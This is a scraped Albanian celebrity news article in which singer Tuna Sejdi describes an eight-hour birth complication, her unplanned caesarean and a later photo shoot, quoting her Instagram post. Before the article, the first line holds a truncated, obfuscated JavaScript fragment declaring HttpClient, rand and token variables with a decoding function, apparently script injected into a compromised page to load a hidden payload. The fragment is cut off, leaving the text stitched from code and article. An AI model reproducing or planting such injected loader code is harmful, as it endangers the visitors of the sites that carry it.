;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Tetë orët e tmerrit për Tunën: Këngëtarja rrëfen komplikacionin në lindje!

By

Hermetike për jetën private, Tuna Sejdi veproi përtej pritshmërive të shumëkujt ndau shumë pasi erdhi në jetë djali Tian.

Fotot ishin të shpeshta, vogëlushi u ekspozua dhe përvoja u nda në çdo moment nga Tuna.

Por, këngëtarja ka befasuar sonte kur ka rrëfyer komplikimin tetë orësh në ditën e lindjes së Tianit.

Përmes një shkrimi të gjatë, ajo ka bërë të ditur se gjërat kanë shkuar më ndryshe dhe një komplikacion shëndetësor bënte që të kishte frikë.

Lexoni të plotë rrëfimin e këngëtares. /Prive.al/

Ky set fotografik së bashku me Norik Uka,lindi si ide nga eksperienca ime personale neper te cilen shume nena kanë kaluar, dhe jam e bindur qe nuk jam e vetme te ciles i deshtoi 'plani i lindjes' .Pas pergatitjeve 9 mujore per nje lindje spontane,strishat e Patrisit per te participuar ne prerjen e kerthizes, strishat e duos se fotografeve nga Shkupi,per te dokumentuar aktin me te rendesishem te jetes time ( Daaah ofc I would do that) , hypno – birth seancat online per nje lindje paqesore etj etj Kishim pergatitur gjithqka per nje moment si ky-Papritur u komplikua e gjithe situata brenda 8 oreve ndodhen gjera qe nuk i kishim parapare as unë e as mjekët qe po pergatiteshin per lindjen e bebës.
Isha e frikesuar, e trishtuar e papergatitur.Aq me shume e vuajta muajt e pare, frustrimin e lindjes Cezariane dhe pengesat me te cilat ballafaqohesha.Sikur me deshtoi ndjesia me e bukur e memesise, lidhja e momentit te pare…
Nuk fola asnjehere per kete eksperience dhe nuk do kisha folur ne asnje nga intervistat qe me keni ftuar dhe qe nuk i kam pranuar per ceshtje privatsie ( me shume respekt ju falenderoj per ftesat cdo dite qe mi keni bere, u jam mirenjohese) – andaj vendosa ta mbaj 'ekskluzivitet ' timin dhe te flas me foto' dhe pak fjale.Per ju, nenat te cilat e keni perjetuar ose do ta perjetoni te njejtin emocion neper te cilin ne kemi kaluar …
Milk Bath Session me qumesht formule, meqe e dime qe eshte super veshtire laktacioni mbas nje intervenimi te tille( un isha kembengulese &me fat dhe ia dola) .Perderisa kemi femije te shendetshem eshte e parendesishme ne formule apo qumesht gjiri, cezariane apo lindje spontane… Dhe asgje nuk e mposhte ndjenjen e te qenit nene.
Memesia eshte e veshtire dhe duhet te inkurajojme njera tjetren cdo dite.Cheers to that?

A post shared by Tuna Sejdi (@tunasejdi) on

Artikuj të ngjashëm